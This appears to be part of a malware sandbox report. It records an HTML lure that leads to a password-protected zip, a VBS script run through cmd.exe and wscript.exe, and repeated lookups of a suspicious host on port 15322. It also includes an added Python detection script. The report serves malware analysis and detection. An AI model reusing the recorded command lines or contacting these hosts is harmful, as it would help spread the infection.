Feb 5, 2025 07:57:22.688606977 CET | 53 | 53503 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:30.028078079 CET | 53 | 59187 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:30.512118101 CET | 53 | 62802 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:32.571749926 CET | 53 | 57075 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:57.159727097 CET | 65419 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:57:57.213608027 CET | 53 | 65419 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:58:01.089693069 CET | 53 | 61550 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:58:16.192627907 CET | 57746 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:58:16.220566988 CET | 53 | 57746 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:58:41.111757040 CET | 53 | 52936 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:58:47.652138948 CET | 53 | 52572 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:59:02.740971088 CET | 52585 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:59:02.770487070 CET | 53 | 52585 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 5, 2025 07:56:30.869518995 CET | 192.168.2.4 | 1.1.1.1 | 0xedb6 | Standard query (0) | s4.histats.com | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.869728088 CET | 192.168.2.4 | 1.1.1.1 | 0xa28d | Standard query (0) | s4.histats.com | 65 | IN (0x0001) | false
Feb 5, 2025 07:56:31.692760944 CET | 192.168.2.4 | 1.1.1.1 | 0x8049 | Standard query (0) | s4.histats.com | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:31.693047047 CET | 192.168.2.4 | 1.1.1.1 | 0x8dee | Standard query (0) | s4.histats.com | 65 | IN (0x0001) | false
Feb 5, 2025 07:56:32.326689005 CET | 192.168.2.4 | 1.1.1.1 | 0xf6e8 | Standard query (0) | host85500.info | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:32.328186035 CET | 192.168.2.4 | 1.1.1.1 | 0x6c0 | Standard query (0) | _15322._https.host85500.info | 65 | IN (0x0001) | false
Feb 5, 2025 07:56:34.805114031 CET | 192.168.2.4 | 1.1.1.1 | 0x68da | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:34.805114031 CET | 192.168.2.4 | 1.1.1.1 | 0xb77d | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Feb 5, 2025 07:56:43.692955017 CET | 192.168.2.4 | 1.1.1.1 | 0xe6d5 | Standard query (0) | s4.histats.com | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:46.370151997 CET | 192.168.2.4 | 1.1.1.1 | 0x9226 | Standard query (0) | host85500.info | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:58.675265074 CET | 192.168.2.4 | 1.1.1.1 | 0xe168 | Standard query (0) | host85500.info | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:57:22.659790039 CET | 192.168.2.4 | 1.1.1.1 | 0xca41 | Standard query (0) | host85500.info | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:57:57.159727097 CET | 192.168.2.4 | 1.1.1.1 | 0x6f44 | Standard query (0) | host85500.info | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:58:16.192627907 CET | 192.168.2.4 | 1.1.1.1 | 0xc9c6 | Standard query (0) | host85500.info | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:59:02.740971088 CET | 192.168.2.4 | 1.1.1.1 | 0xb44 | Standard query (0) | host85500.info | A (IP address) | IN (0x0001) | false
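Two details in the DNS query table carry most of the signal: the repeated re-resolution of host85500.info over the run, and the type 65 (HTTPS record) query for `_15322._https.host85500.info`. Under RFC 9460 a client that is about to fetch an https:// origin on a port other than 443 prefixes the HTTPS-record lookup with `_<port>._https.`, so the non-standard port the sample later connects to (45.93.9.167:15322 in the TCP table) is already visible in DNS before the TCP handshake. The script below is an added example, not part of the Joe Sandbox report: it takes rows transcribed from the DNS query and TCP tables (a constructed subset, with `|` as our own field separator since the report's output runs the fields together), pulls the port hint out of the SVCB-style name, measures the gaps between successive lookups of the host, flags outbound flows to unexpected server ports, and joins the hint to the flows by port. The join is by port only; whether host85500.info resolves to 45.93.9.167 is something the report's DNS answer table, not this excerpt, would confirm.

```python
"""Extract DNS port hints, lookup cadence and odd server ports from sandbox tables.

Added example, not part of the report. Rows are transcribed from the DNS query
and TCP packet tables above; the '|' separator and the subset chosen are ours.
"""
import re
from datetime import datetime

# Constructed input: timestamp | src ip | dst ip | transaction id | name | type.
# Type 65 is the HTTPS resource record (RFC 9460).
DNS_QUERIES = """\
Feb 5, 2025 07:56:30.869518995 CET|192.168.2.4|1.1.1.1|0xedb6|s4.histats.com|A
Feb 5, 2025 07:56:30.869728088 CET|192.168.2.4|1.1.1.1|0xa28d|s4.histats.com|65
Feb 5, 2025 07:56:32.326689005 CET|192.168.2.4|1.1.1.1|0xf6e8|host85500.info|A
Feb 5, 2025 07:56:32.328186035 CET|192.168.2.4|1.1.1.1|0x6c0|_15322._https.host85500.info|65
Feb 5, 2025 07:56:34.805114031 CET|192.168.2.4|1.1.1.1|0x68da|www.google.com|A
Feb 5, 2025 07:56:46.370151997 CET|192.168.2.4|1.1.1.1|0x9226|host85500.info|A
Feb 5, 2025 07:56:58.675265074 CET|192.168.2.4|1.1.1.1|0xe168|host85500.info|A
Feb 5, 2025 07:57:22.659790039 CET|192.168.2.4|1.1.1.1|0xca41|host85500.info|A
Feb 5, 2025 07:57:57.159727097 CET|192.168.2.4|1.1.1.1|0x6f44|host85500.info|A
Feb 5, 2025 07:58:16.192627907 CET|192.168.2.4|1.1.1.1|0xc9c6|host85500.info|A
Feb 5, 2025 07:59:02.740971088 CET|192.168.2.4|1.1.1.1|0xb44|host85500.info|A
"""

# Constructed input: timestamp | src port | dst port | src ip | dst ip,
# one or two representative packets per TCP flow from the table above.
TCP_PACKETS = """\
Feb 5, 2025 07:57:32.572304964 CET|56878|53|192.168.2.4|1.1.1.1
Feb 5, 2025 07:57:34.864906073 CET|56893|443|192.168.2.4|142.250.186.36
Feb 5, 2025 07:57:36.660382032 CET|49724|80|192.168.2.4|199.232.214.172
Feb 5, 2025 07:58:26.390721083 CET|49757|15322|192.168.2.4|45.93.9.167
Feb 5, 2025 07:58:26.396091938 CET|15322|49757|45.93.9.167|192.168.2.4
"""

SANDBOX_HOST = "192.168.2.4"          # the analysis VM in these tables
EXPECTED_SERVER_PORTS = {53, 80, 443}  # assumption: anything else is worth a look
# RFC 9460: HTTPS-record lookups for a non-443 port are named _<port>._https.<host>
SVCB_PREFIX = re.compile(r"^_(\d+)\._https\.(.+)$")


def parse_ts(text):
    """Parse 'Feb 5, 2025 07:56:30.869518995 CET'; nanoseconds truncated to micro."""
    m = re.match(r"(\w{3} \d+, \d{4} \d\d:\d\d:\d\d\.\d{6})\d* CET$", text)
    if not m:
        raise ValueError("unexpected timestamp: %r" % text)
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


def parse_rows(block):
    """Split the '|'-delimited rows into lists of fields."""
    return [line.split("|") for line in block.strip().splitlines()]


def svcb_port_hints(queries):
    """host -> non-default HTTPS port leaked by _<port>._https.<host> type-65 queries."""
    hints = {}
    for _ts, _src, _dst, _txid, name, rtype in parse_rows(queries):
        m = SVCB_PREFIX.match(name)
        if rtype == "65" and m:
            hints[m.group(2)] = int(m.group(1))
    return hints


def query_intervals(queries, host, rtype="A"):
    """Seconds between successive lookups of host; re-resolution cadence tracks beacon cadence."""
    times = [parse_ts(r[0]) for r in parse_rows(queries) if r[4] == host and r[5] == rtype]
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def unexpected_server_ports(packets):
    """(server ip, port) for outbound flows whose destination port is not 53/80/443."""
    found = set()
    for _ts, _sport, dport, sip, dip in parse_rows(packets):
        if sip == SANDBOX_HOST and int(dport) not in EXPECTED_SERVER_PORTS:
            found.add((dip, int(dport)))
    return found


def correlate(queries, packets):
    """Join DNS port hints to observed outbound flows: host -> {(server ip, port)}."""
    hints = svcb_port_hints(queries)
    hits = {}
    for _ts, _sport, dport, sip, dip in parse_rows(packets):
        for host, port in hints.items():
            if sip == SANDBOX_HOST and int(dport) == port:
                hits.setdefault(host, set()).add((dip, port))
    return hits


if __name__ == "__main__":
    print("port hints from DNS:", svcb_port_hints(DNS_QUERIES))
    gaps = query_intervals(DNS_QUERIES, "host85500.info")
    print("host85500.info re-resolution gaps (s):", [round(g, 1) for g in gaps])
    print("unexpected server ports:", unexpected_server_ports(TCP_PACKETS))
    print("DNS hint -> flow correlation:", correlate(DNS_QUERIES, TCP_PACKETS))
```

The gaps between the host85500.info lookups are irregular (roughly 12 to 47 seconds in this excerpt), so a fixed-interval beacon check would miss them; the port-hint join is the more robust pivot here because the `_15322._https.` label ties the domain to the port before any payload is exchanged.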
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 142.4.219.198 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 149.56.240.31 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 158.69.254.144 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 149.56.240.132 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 149.56.240.127 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 54.39.156.32 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 149.56.240.130 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 149.56.240.131 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 54.39.128.117 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 54.39.128.162 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 149.56.240.27 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 149.56.240.128 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:30.879329920 CET | 1.1.1.1 | 192.168.2.4 | 0xedb6 | No error (0) | s4.histats.com | | 149.56.240.129 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:31.699425936 CET | 1.1.1.1 | 192.168.2.4 | 0x8049 | No error (0) | s4.histats.com | | 54.39.156.32 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:31.699425936 CET | 1.1.1.1 | 192.168.2.4 | 0x8049 | No error (0) | s4.histats.com | | 149.56.240.131 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:31.699425936 CET | 1.1.1.1 | 192.168.2.4 | 0x8049 | No error (0) | s4.histats.com | | 54.39.128.162 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:31.699425936 CET | 1.1.1.1 | 192.168.2.4 | 0x8049 | No error (0) | s4.histats.com | | 158.69.254.144 | A (IP address) | IN (0x0001) | false
Feb 5, 2025 07:56:31.699425936 CET | 1.1.1.1 | 192.168.2.4 | 0x8049 | No error (0) | s4.histats.com | | 149.56.240.27 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.355285883 CET1.1.1.1192.168.2.40x6c0Name error (3)_15322._https.host85500.infononenone65IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.370181084 CET1.1.1.1192.168.2.40xf6e8No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.812081099 CET1.1.1.1192.168.2.40x68daNo error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.812093019 CET1.1.1.1192.168.2.40xb77dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.398881912 CET1.1.1.1192.168.2.40x9226No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:58.704420090 CET1.1.1.1192.168.2.40xe168No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:22.688606977 CET1.1.1.1192.168.2.40xca41No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:57.213608027 CET1.1.1.1192.168.2.40x6f44No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:16.220566988 CET1.1.1.1192.168.2.40xc9c6No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:59:02.770487070 CET1.1.1.1192.168.2.40xb44No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
• s4.histats.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49734 | 142.4.219.198 | 443 | 4544 | C:\Program Files\Google\Chrome\Application\chrome.exe |

Timestamp | Bytes transferred | Direction | Data (on the lines that follow)

2025-02-05 06:56:31 UTC | 754 | OUT
GET /stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
Host: s4.histats.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

2025-02-05 06:56:31 UTC | 135 | IN
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2025 06:56:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 376
Connection: close

2025-02-05 06:56:31 UTC | 376 | IN
Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49739 | 54.39.156.32 | 443 | 4544 | C:\Program Files\Google\Chrome\Application\chrome.exe |

Timestamp | Bytes transferred | Direction | Data (on the lines that follow)

2025-02-05 06:56:32 UTC | 554 | OUT
GET /stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
Host: s4.histats.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

2025-02-05 06:56:32 UTC | 135 | IN
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2025 06:56:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 376
Connection: close

2025-02-05 06:56:32 UTC | 376 | IN
Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49748 | 54.39.156.32 | 443 | 6884 | C:\Windows\SysWOW64\wscript.exe |

Timestamp | Bytes transferred | Direction | Data (on the lines that follow)

2025-02-05 06:56:44 UTC | 365 | OUT
GET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
Accept: */*
Accept-Language: en-ch
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: s4.histats.com
Connection: Keep-Alive

2025-02-05 06:56:44 UTC | 135 | IN
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2025 06:56:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 376
Connection: close

2025-02-05 06:56:44 UTC | 376 | IN
Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                                                                                                                                                                                                                            Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


Target ID: 0
Start time: 01:56:25
Start date: 05/02/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\CfF7MWq7aG.html"
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 01:56:29
Start date: 05/02/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1836,i,5843688646892688928,17905010364784798591,262144 /prefetch:8
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 01:56:35
Start date: 05/02/2025
Path: C:\Windows\SysWOW64\unarchiver.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
Imagebase: 0x500000
File size: 12'800 bytes
MD5 hash: 16FF3CC6CC330A08EED70CBC1D35F5D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 01:56:35
Start date: 05/02/2025
Path: C:\Windows\SysWOW64\7za.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
Imagebase: 0x280000
File size: 289'792 bytes
MD5 hash: 77E556CDFDC5C592F5C46DB4127C6F4C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 01:56:35
Start date: 05/02/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 01:56:36
Start date: 05/02/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 01:56:36
Start date: 05/02/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
